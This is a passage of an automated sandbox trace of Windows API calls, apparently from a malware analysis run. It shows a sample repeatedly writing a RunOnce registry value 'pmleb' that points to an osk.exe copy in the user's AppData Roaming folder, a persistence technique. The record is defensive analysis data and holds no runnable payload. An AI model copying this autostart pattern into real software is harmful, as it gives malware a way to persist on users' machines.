lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.691] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.692] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0080.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.692] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.692] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.692] RegCloseKey (hKey=0x280) returned 0x0 [0080.692] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.692] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.692] SetTimer (hWnd=0x20280, nIDEvent=0x2087, uElapse=0xa, lpTimerFunc=0x0) returned 0x2087 [0080.692] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.705] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.705] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.705] KillTimer (hWnd=0x20280, uIDEvent=0x2087) returned 1 [0080.705] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.705] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.705] IUnknown:Release (This=0x787518) returned 0x1 [0080.705] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0080.706] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.706] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.706] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.706] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.706] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.706] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, 
[6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.706] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.706] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.706] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xc [0080.706] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.706] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xd [0080.706] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.707] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xc [0080.707] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.707] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.707] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.707] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.707] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.708] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.708] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.708] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.708] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.708] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.708] RegCloseKey (hKey=0x280) returned 0x0 [0080.708] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.708] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.708] SetTimer (hWnd=0x20280, nIDEvent=0x2088, uElapse=0xa, lpTimerFunc=0x0) returned 0x2088 [0080.709] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.720] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.720] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.721] KillTimer (hWnd=0x20280, uIDEvent=0x2088) returned 1 [0080.721] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.721] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.721] IUnknown:Release (This=0x787518) returned 0x1 [0080.721] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.721] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.721] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.721] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.721] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.721] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.722] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.722] 
FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.722] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.722] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xd [0080.722] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.722] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xe [0080.722] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.723] 
FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xd [0080.723] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.723] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.723] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.723] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.723] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.723] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.723] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.723] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.724] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.724] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.724] RegCloseKey (hKey=0x280) returned 0x0 [0080.724] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.724] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.724] SetTimer (hWnd=0x20280, nIDEvent=0x2089, uElapse=0xa, lpTimerFunc=0x0) returned 0x2089 [0080.724] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.735] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.735] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.736] KillTimer (hWnd=0x20280, uIDEvent=0x2089) returned 1 [0080.736] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.736] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.736] IUnknown:Release (This=0x787518) returned 0x1 [0080.736] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.736] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.736] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, 
Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.736] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.737] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.737] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.737] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.737] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, 
Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.737] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.737] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xe [0080.737] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.737] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xf [0080.737] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.738] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xe [0080.738] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.738] 
